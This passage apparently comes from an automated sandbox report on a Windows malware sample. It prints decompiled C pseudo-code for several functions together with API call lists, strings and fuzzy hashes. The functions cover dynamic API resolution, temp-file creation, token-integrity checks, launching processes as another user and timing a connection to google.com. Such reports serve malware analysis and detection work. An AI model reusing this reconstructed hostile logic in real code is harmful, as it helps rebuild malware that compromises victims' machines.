            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,00000003,00000000,00000008), ref: 00408B4C
              • Part of subcall function 00415BE8: FindFirstFileW.KERNEL32(?,?,?,?,00000000,00000000,00000104), ref: 00415C27
              • Part of subcall function 00415BE8: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00415C4E
              • Part of subcall function 00415BE8: PathMatchSpecW.SHLWAPI(?,?), ref: 00415C99
              • Part of subcall function 00415BE8: Sleep.KERNEL32(00000000,?,?), ref: 00415CF6
              • Part of subcall function 00415BE8: FindNextFileW.KERNEL32(?,?), ref: 00415D24
              • Part of subcall function 00415BE8: FindClose.KERNEL32(?), ref: 00415D36
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Find$FilePath$CloseFirstFolderMatchNextObjectSingleSleepSpecWait
            • String ID: #$&
            • API String ID: 1211921070-3870246384
            • Opcode ID: 0590e204195eb293cceff165757324a238d53069dc3fd10d3df4ee4b71751789
            • Instruction ID: 34c4962d11e19cafc2c6bfe13892630ad9b3e887822c94b2e4d052b4867e2afd
            • Opcode Fuzzy Hash: 0590e204195eb293cceff165757324a238d53069dc3fd10d3df4ee4b71751789
            • Instruction Fuzzy Hash: 72115171E01228BADB20AAA2DC49FDF7F78EF45754F00406AF644B7180D7786689CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			E004041CD(void* __eflags) {
            				char _v8;
            				char _v20;
            				char _v44;
            				char _v92;
            				void* __edi;
            				void* __esi;
            				void* _t15;
            				CHAR* _t25;
            				intOrPtr* _t26;
            				WCHAR* _t28;
            				struct HINSTANCE__* _t29;
            
            				_t28 =  &_v44;
            				E0040F369(0xb0, _t28);
            				_t29 = GetModuleHandleW(_t28);
            				if(_t29 != 0) {
            					_t25 =  &_v20;
            					E0040F333(0xb1, _t25);
            					_t26 = GetProcAddress(_t29, _t25);
            					if(_t26 == 0) {
            						L4:
            						_t15 = 0;
            						L6:
            						return _t15;
            					}
            					_t30 =  &_v92;
            					E0040F369(0xa9,  &_v92);
            					_push(0x1e6);
            					_push("0xE35E00DF");
            					if(E00411220( &_v8, _t30, 0x2000800) > 0) {
            						 *_t26(0, _v8, "#", 0x10040);
            						E00410418(_v8);
            						_t15 = 1;
            						goto L6;
            					}
            					goto L4;
            				}
            				return 0;
            			}

            0x004041d4
            0x004041dc
            0x004041ea
            0x004041ee
            0x004041f5
            0x004041fd
            0x0040420c
            0x00404210
            0x00404241
            0x00404241
            0x00404260
            0x00000000
            0x00404260
            0x00404212
            0x0040421a
            0x0040421f
            0x00404224
            0x0040423f
            0x00404254
            0x00404259
            0x0040425e
            0x00000000
            0x0040425e
            0x00000000
            0x0040423f
            0x00000000

            APIs
            • GetModuleHandleW.KERNEL32(?), ref: 004041E4
            • GetProcAddress.KERNEL32(00000000,?), ref: 00404206
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: 0xE35E00DF
            • API String ID: 1646373207-599444087
            • Opcode ID: 295d01dee4f56c742eabeb589fed522242a170563ee6c9ad88657b0826af9943
            • Instruction ID: 214ceab3a2ce7850f8b748d36facc339d42c2989061227f6b29c59e2aaf7a6f7
            • Opcode Fuzzy Hash: 295d01dee4f56c742eabeb589fed522242a170563ee6c9ad88657b0826af9943
            • Instruction Fuzzy Hash: F001F17AB4031477DB2066B98C06BDF37689B84B50F000076FE00F72C1C678994696A9
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00403ED1(void* __ecx, WCHAR* __edi, signed int _a4) {
            				char _v108;
            				char _v158;
            				char _v178;
            				char _v198;
            				char _v596;
            				void* __esi;
            				signed int _t12;
            				int _t14;
            				WCHAR* _t16;
            				char* _t18;
            				WCHAR* _t19;
            
            				_t19 = __edi;
            				 *__edi = 0;
            				E00403E7C(__ecx,  &_v596);
            				_t12 = _a4;
            				if(_t12 == 0) {
            					L6:
            					_t18 =  &_v178;
            					goto L7;
            				} else {
            					_t12 = _t12 - 1;
            					if(_t12 == 0) {
            						_t18 =  &_v198;
            						L7:
            						_t16 = 0x41a2f0;
            						goto L8;
            					} else {
            						_t12 = _t12 - 1;
            						if(_t12 == 0) {
            							goto L6;
            						} else {
            							_t14 = _t12 - 1;
            							if(_t14 == 0) {
            								_t16 = L"SOFTWARE\\Microsoft";
            								_t18 =  &_v158;
            								L8:
            								_t21 =  &_v108;
            								_t14 = E00410628(_t12 | 0xffffffff, _t18,  &_v108, 0, 0x32);
            								if(_t14 != 0) {
            									_t14 = E00415D45(_t21, _t19, _t16);
            									if(_t14 == 0) {
            										L12:
            										_t14 = 0;
            										 *_t19 = 0;
            									} else {
            										if(_a4 == 0) {
            											_t14 = PathRenameExtensionW(_t19, L".dat");
            											if(_t14 == 0) {
            												goto L12;
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				return _t14;
            			}

            0x00403ed1
            0x00403edd
            0x00403ee8
            0x00403ef0
            0x00403ef3
            0x00403f13
            0x00403f13
            0x00000000
            0x00403ef5
            0x00403ef5
            0x00403ef6
            0x00403f0b
            0x00403f19
            0x00403f19
            0x00000000
            0x00403ef8
            0x00403ef8
            0x00403ef9
            0x00000000
            0x00403efb
            0x00403efb
            0x00403efc
            0x00403efe
            0x00403f03
            0x00403f1e
            0x00403f22
            0x00403f28
            0x00403f2f
            0x00403f35
            0x00403f3c
            0x00403f54
            0x00403f54
            0x00403f56
            0x00403f3e
            0x00403f42
            0x00403f4a
            0x00403f52
            0x00000000
            0x00000000
            0x00403f52
            0x00403f42
            0x00403f3c
            0x00403f2f
            0x00403efc
            0x00403ef9
            0x00403ef6
            0x00403f5c

            APIs
            • PathRenameExtensionW.SHLWAPI(?,.dat,?,0041A2F0,00000000,00000032,?,774B9EB0,00000000), ref: 00403F4A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: ExtensionPathRename
            • String ID: .dat$SOFTWARE\Microsoft
            • API String ID: 3337224433-47915998
            • Opcode ID: 75e190ddd1b3f717aeeb4023e13b22f82dca6b05ea67229a07a45ceb80d7a890
            • Instruction ID: 290486f5f4943682b8afa71fad261a398db649d8f508f66508e8a98a3c8afc9b
            • Opcode Fuzzy Hash: 75e190ddd1b3f717aeeb4023e13b22f82dca6b05ea67229a07a45ceb80d7a890
            • Instruction Fuzzy Hash: F7019234A1020795DB24AF69AC41BABBB7C9F50346F404077AA09F62C1D77CDF84C65E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 81%
            			E004158F8(intOrPtr _a4, intOrPtr _a8) {
            				short _v524;
            				char _v1044;
            				void* __edi;
            				void* _t12;
            				void* _t20;
            				void* _t21;
            
            				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
            					L6:
            					return 0;
            				}
            				_t20 = 0;
            				while(1) {
            					_push(_a4);
            					_push(E00411812());
            					_push(L"tmp");
            					_t19 =  &_v1044;
            					_t12 = E004111A5(_t11, 0x104,  &_v1044, L"%s%08x.%s");
            					_t21 = _t21 + 0x10;
            					if(_t12 == 0xffffffff) {
            						goto L6;
            					}
            					if(E00415D45(_t19, _a8,  &_v524) == 0 || E004156EB(_a8, 0, 0) == 0) {
            						_t20 = _t20 + 1;
            						if(_t20 < 0x64) {
            							continue;
            						}
            						goto L6;
            					} else {
            						return 1;
            					}
            				}
            				goto L6;
            			}

            0x0041591b
            0x00415975
            0x00000000
            0x00415975
            0x0041591d
            0x0041591f
            0x0041591f
            0x00415927
            0x00415928
            0x00415937
            0x0041593d
            0x00415942
            0x00415948
            0x00000000
            0x00000000
            0x0041595d
            0x0041596f
            0x00415973
            0x00000000
            0x00000000
            0x00000000
            0x0041597d
            0x00000000
            0x0041597d
            0x0041595d
            0x00000000

            APIs
            • GetTempPathW.KERNEL32(000000F6,?), ref: 0041590F
              • Part of subcall function 00411812: GetTickCount.KERNEL32 ref: 00411812
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
              • Part of subcall function 004156EB: CreateFileW.KERNEL32(00414B12,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0041596B,00414B12,00000000,00000000,00414B12,?), ref: 00415705
              • Part of subcall function 004156EB: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041596B,00414B12,00000000,00000000,00414B12,?), ref: 00415728
              • Part of subcall function 004156EB: CloseHandle.KERNEL32(00000000,?,0041596B,00414B12,00000000,00000000,00414B12,?), ref: 00415735
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
            • String ID: %s%08x.%s$tmp
            • API String ID: 3395140874-234517578
            • Opcode ID: 8b3a8e8ef4d45cde3121f8d419920383e11139a39ef9d6d9707cb50fed25fc97
            • Instruction ID: 36163f725cec66851bbd01b2d42d07bc3692d2c84e16816cf316ffba1f607d75
            • Opcode Fuzzy Hash: 8b3a8e8ef4d45cde3121f8d419920383e11139a39ef9d6d9707cb50fed25fc97
            • Instruction Fuzzy Hash: 5B014EB2200618F6EF203A149C05BEF7719D781734F104173FE24B61E1C2799DC69A5D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00413E47(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
            				short _v524;
            				intOrPtr _t24;
            				int _t26;
            
            				_t26 = 0;
            				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) > 0 && E004158D7( &_v524) != 0) {
            					_t24 = _a4;
            					E00411075(PathFindFileNameW( &_v524), _a8 + 0xfffffffd);
            					E00410454(_t24, "?T", 2);
            					 *((char*)(_t24 + 2)) = 0x5c;
            					_t26 = 1;
            				}
            				return _t26;
            			}

            0x00413e5b
            0x00413e71
            0x00413e87
            0x00413ea0
            0x00413ead
            0x00413eb4
            0x00413eb8
            0x00413eb9
            0x00413ebe

            APIs
            • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00413E69
              • Part of subcall function 004158D7: SetFileAttributesW.KERNEL32(00000080,00000080,0040A6AE,?), ref: 004158E0
              • Part of subcall function 004158D7: DeleteFileW.KERNEL32(?), ref: 004158EA
            • PathFindFileNameW.SHLWAPI(?,?,?,?), ref: 00413E98
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$Name$AttributesDeleteFindPathTemp
            • String ID: cab
            • API String ID: 394148526-1787492089
            • Opcode ID: 34ab339e8feb188d6e190403a8150a3f8e476c5a09618b0ff8741c27cdbe8d74
            • Instruction ID: 95a472924949ede86cea5556a6d624c01ecdf4eb58aabcd4d22f8ce08fb6d478
            • Opcode Fuzzy Hash: 34ab339e8feb188d6e190403a8150a3f8e476c5a09618b0ff8741c27cdbe8d74
            • Instruction Fuzzy Hash: 5E018B3260031467DB109B65CC49FCBB7AC9F44755F004266B955F3191DA78EA4486D4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 84%
            			E0040503F(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
            				void* _t13;
            				void** _t24;
            				void* _t27;
            
            				_t13 = _a4(_a8,  &_a8);
            				if(_t13 != 0) {
            					_t24 = E00413971(__ecx, _a8);
            					if(_t24 != 0) {
            						if(EqualSid( *_t24, _a12) != 0) {
            							_t27 = _a8;
            							if(E00411220( &_a4,  &M00403140, _a16) > 0) {
            								E00411D38(_t27, _a4);
            								E00410418(_a4);
            							}
            						}
            						E00410418(_t24);
            					}
            					return CloseHandle(_a8);
            				}
            				return _t13;
            			}

            0x00405049
            0x0040504e
            0x00405059
            0x0040505d
            0x0040506c
            0x00405072
            0x00405088
            0x0040508e
            0x00405096
            0x00405096
            0x0040509b
            0x0040509d
            0x0040509d
            0x00000000
            0x004050ab
            0x004050ad

            APIs
              • Part of subcall function 00413971: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,00411A4E,?,?,?,00403B10,000000FF,0041A2A0), ref: 0041398A
              • Part of subcall function 00413971: GetLastError.KERNEL32(?,00000000,?,?,00411A4E,?,?,?,00403B10,000000FF,0041A2A0,00000000,?,00000000), ref: 00413990
              • Part of subcall function 00413971: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,00411A4E,?,?,?,00403B10,000000FF,0041A2A0), ref: 004139BA
            • EqualSid.ADVAPI32(00000000,?,?,004051B9,?,00405199,004051B9,?,00000001,?,0040460E,00000001,?), ref: 00405064
              • Part of subcall function 00411D38: LoadLibraryA.KERNEL32(userenv.dll,00000001), ref: 00411D49
              • Part of subcall function 00411D38: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00411D68
              • Part of subcall function 00411D38: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00411D74
              • Part of subcall function 00411D38: CreateProcessAsUserW.ADVAPI32(?,00000000,00405093,00000000,00000000,00000000,00405093,00405093,00000000,?,?,?,00000000,00000044), ref: 00411DE5
              • Part of subcall function 00411D38: CloseHandle.KERNEL32(?), ref: 00411DF8
              • Part of subcall function 00411D38: CloseHandle.KERNEL32(?), ref: 00411DFD
              • Part of subcall function 00411D38: FreeLibrary.KERNEL32(?), ref: 00411E14
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            • CloseHandle.KERNEL32(?,?,004051B9,?,00405199,004051B9,?,00000001,?,0040460E,00000001,?), ref: 004050A5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
            • String ID: "%s"
            • API String ID: 4035272744-3297466227
            • Opcode ID: 8f56f32f9d776c86d182f73d6dac292417ea535fa9fb18d101ac2859fdccc457
            • Instruction ID: de1327ba5f535dbe86a1987ce78f5487b0f32bd7d059fc8aa046bd08f94f7674
            • Opcode Fuzzy Hash: 8f56f32f9d776c86d182f73d6dac292417ea535fa9fb18d101ac2859fdccc457
            • Instruction Fuzzy Hash: 4CF01D35100109BBDF116F62EC45DDF3F69EF44765B048036FE08A5161DB39DAA09BA8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0041234E(intOrPtr __eax, void* __eflags) {
            				long _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				char* _v40;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				char _v55;
            				char _v56;
            				void* __edi;
            				intOrPtr _t27;
            
            				_t27 = 0;
            				_v56 = 1;
            				_v55 = 1;
            				_v52 = 0;
            				_v48 = __eax;
            				_v44 = E004122CD();
            				_v40 = "http://www.google.com/webhp";
            				_v36 = 0;
            				_v32 = 0;
            				_v28 = 0;
            				_v24 = 0;
            				_v20 = 0;
            				_v16 = 0x80000;
            				_v12 = 0;
            				_v8 = GetTickCount();
            				if(E0041219B( &_v56, 0) != 0) {
            					_t27 = GetTickCount() - _v8;
            				}
            				E00410418(_v44);
            				return _t27;
            			}

            0x00412356
            0x00412359
            0x0041235d
            0x00412361
            0x00412364
            0x00412372
            0x00412375
            0x0041237c
            0x0041237f
            0x00412382
            0x00412385
            0x00412388
            0x0041238b
            0x00412392
            0x0041239b
            0x004123a5
            0x004123ab
            0x004123ab
            0x004123b1
            0x004123bc

            APIs
              • Part of subcall function 004122CD: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 004122DE
              • Part of subcall function 004122CD: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 004122F1
              • Part of subcall function 004122CD: FreeLibrary.KERNEL32(?), ref: 00412343
            • GetTickCount.KERNEL32 ref: 00412395
              • Part of subcall function 0041219B: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 004121EF
              • Part of subcall function 0041219B: InternetCloseHandle.WININET(00000000), ref: 00412288
            • GetTickCount.KERNEL32 ref: 004123A7
            Strings
            • http://www.google.com/webhp, xrefs: 00412375
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
            • String ID: http://www.google.com/webhp
            • API String ID: 2673491915-2670330958
            • Opcode ID: 34f626b8b5391ffe4678d737750fe3096cc0766a801a2eedb9d2969d0c33afec
            • Instruction ID: b7d87d393a00f6d3ff7478f70dd80c538920e7b4efe6c92315f4941bdff8a685
            • Opcode Fuzzy Hash: 34f626b8b5391ffe4678d737750fe3096cc0766a801a2eedb9d2969d0c33afec
            • Instruction Fuzzy Hash: EA01C8B1C11228AACF00EFE9DA445CDFBB8AF08758F10416BE910B7251D3B95A458BE9
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0041484C(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, WCHAR* _a16, char _a20) {
            				char _v524;
            				void* _t21;
            
            				_t21 = 0;
            				while(1) {
            					_t3 =  &_a20; // 0x405a51
            					E0041471A( *_t3, 4, 0, _a4,  &_v524);
            					if(E00415D45( &_v524, _a12, _a8) != 0 && (_a16 == 0 || PathAddExtensionW(_a12, _a16) != 0) && GetFileAttributesW(_a12) == 0xffffffff) {
            						break;
            					}
            					_t21 = _t21 + 1;
            					if(_t21 < 0x64) {
            						continue;
            					}
            					return 0;
            				}
            				return 1;
            			}

            0x00414856
            0x00414858
            0x00414862
            0x00414867
            0x0041487f
            0x00000000
            0x00000000
            0x004148a5
            0x004148a9
            0x00000000
            0x00000000
            0x00000000
            0x004148ab
            0x00000000

            APIs
              • Part of subcall function 0041471A: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041483C
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • PathAddExtensionW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 0041488D
            • GetFileAttributesW.KERNEL32(?,?,?,?,?,00000000), ref: 0041489A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Path$AttributesCharCombineExtensionFileUpper
            • String ID: QZ@
            • API String ID: 1608718705-2763483611
            • Opcode ID: f864a30776303c99050a321279a0f582713915ca6dac1713dd78a05a14e223e4
            • Instruction ID: 2f13b75feab0b7af197fae2ac6940f87bfe199e0202b6e71fbc43ecf614aa425
            • Opcode Fuzzy Hash: f864a30776303c99050a321279a0f582713915ca6dac1713dd78a05a14e223e4
            • Instruction Fuzzy Hash: 8AF0AF390002999BDF117F20DC08ADB3BA9AF41314F100162BC75A11B1C739C9E5DBA8
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetFileSizeEx.KERNEL32(pcA,pcA,?,?,?,00416370,00000000), ref: 0041587B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: FileSize
            • String ID: pcA$pcA
            • API String ID: 3433856609-2925337091
            • Opcode ID: 6ba33f325e9202a96636ff95ee68f34ae1b4b1d87b92ee624ec7db9df8b6777e
            • Instruction ID: 6343ac0d896cac72530366b4ca8b2af1a14618cd811eec335676e342a510c66f
            • Opcode Fuzzy Hash: 6ba33f325e9202a96636ff95ee68f34ae1b4b1d87b92ee624ec7db9df8b6777e
            • Instruction Fuzzy Hash: D2D05E71600108FBDB08DF99CC41CDE7BBDDB84360B148221B52296290D370EE919664
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040B9DA(intOrPtr _a4) {
            				intOrPtr _v8;
            				void* __esi;
            				void* _t13;
            				signed int _t19;
            				signed int _t22;
            				signed short _t27;
            				signed int _t31;
            				signed int _t18; // declaration was missing in the decompiler output; used below
            				void* _t38;
            
            				_t38 = E00411098(_a4);
            				if(_t38 > 0x3e8) {
            					EnterCriticalSection(0x41aa48);
            					E00410418( *0x41aa3c);
            					 *0x41aa3c =  *0x41aa3c & 0x00000000;
            					 *0x41aa44 = 0;
            					LeaveCriticalSection(0x41aa48);
            					return 0;
            				}
            				EnterCriticalSection(0x41aa48);
            				_t27 = ( *0x41aa44 & 0x0000ffff) + _t38;
            				if(_t27 <= 0x3e8) {
            					_t13 = E004103A8(_t27 + _t27, 0x41aa3c);
            					if(_t13 != 0) {
            						_t31 =  *0x41aa3c; // 0x0
            						_t13 = E00410454(_t31 + ( *0x41aa44 & 0x0000ffff) * 2, _a4, _t38 + _t38);
            						 *0x41aa44 = _t27;
            					}
            				} else {
            					_t13 = E004103A8(0x7d0, 0x41aa3c);
            					if(_t13 != 0) {
            						_t18 = 0x3e8 - _t38;
            						_t19 =  *0x41aa3c; // 0x0
            						E00410454(_t19, _t19 + (( *0x41aa44 & 0x0000ffff) - 0x3e8 - _t38) * 2, 0x3e8 - _t38 + _t18);
            						_t22 =  *0x41aa3c; // 0x0
            						_t13 = E00410454(0x3e8 - _t38 + _t18 + _t22, _v8, _t38 + _t38);
            						 *0x41aa44 = 0x3e8;
            					}
            				}
            				LeaveCriticalSection(0x41aa48);
            				return _t13;
            			}

            APIs
            • EnterCriticalSection.KERNEL32(0041AA48,?,?,?,0040BCD5,?), ref: 0040B9F7
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            • LeaveCriticalSection.KERNEL32(0041AA48,?,?,?,0040BCD5,?), ref: 0040BA18
            • EnterCriticalSection.KERNEL32(0041AA48,?,?,?,?,0040BCD5,?), ref: 0040BA29
            • LeaveCriticalSection.KERNEL32(0041AA48,?,?,?,0040BCD5,?), ref: 0040BAC3
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave$FreeHeap
            • String ID:
            • API String ID: 1946732658-0
            • Opcode ID: 88fcec2881c9d694ad576b08e08077100b77a3ba60a83f58d9bdb58bf3aed55e
            • Instruction ID: 58294bfac58941e6c5e768dd41daeb90d1b738a76378483031a66887db6d87b7
            • Opcode Fuzzy Hash: 88fcec2881c9d694ad576b08e08077100b77a3ba60a83f58d9bdb58bf3aed55e
            • Instruction Fuzzy Hash: 7D2186316011049BC711EF95EF859F93768EF84389704807FF50597662DB7C58A8CB9E
            Uniqueness

            Uniqueness Score: -1.00%